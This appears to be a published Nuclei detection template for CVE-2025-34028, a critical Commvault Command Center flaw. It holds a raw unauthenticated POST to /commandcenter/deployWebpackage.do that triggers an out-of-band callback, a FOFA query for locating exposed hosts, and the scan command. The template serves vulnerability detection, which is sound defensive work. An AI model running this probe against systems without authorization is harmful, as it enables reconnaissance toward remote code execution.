Skip to content

Commvault - SSRF via /commandcenter/deployWebpackage.do

ID: CVE-2025-34028

Severity: critical

Author: DhiyaneshDk,abhishekrautela

Tags: cve,cve2025,ssrf,oast,commvault

A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38.

id: CVE-2025-34028
info:
name: Commvault - SSRF via /commandcenter/deployWebpackage.do
author: DhiyaneshDk,abhishekrautela
severity: critical
description: |
A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38.
reference:
- https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html
- https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
- https://nvd.nist.gov/vuln/detail/CVE-2025-34028
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-34028
cwe-id: CWE-22
epss-score: 0.00202
epss-percentile: 0.42778
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="1209838013"
tags: cve,cve2025,ssrf,oast,commvault
variables:
string: "{{to_lower(rand_base(5))}}"
http:
- raw:
- |
POST /commandcenter/deployWebpackage.do HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
commcellName={{interactsh-url}}&servicePack={{string}}&version=x
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
- 'status_code == 900'
condition: and
# digest: 490a00463044022005b15f710567f420e74d475bee2dfb37eb3ddc2f599299c029fee86c3371fef202202900e08d01fba4132cf0013b228bff30039c45b0dfae1c2ba816d1e260855668:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-34028.yaml"

View on Github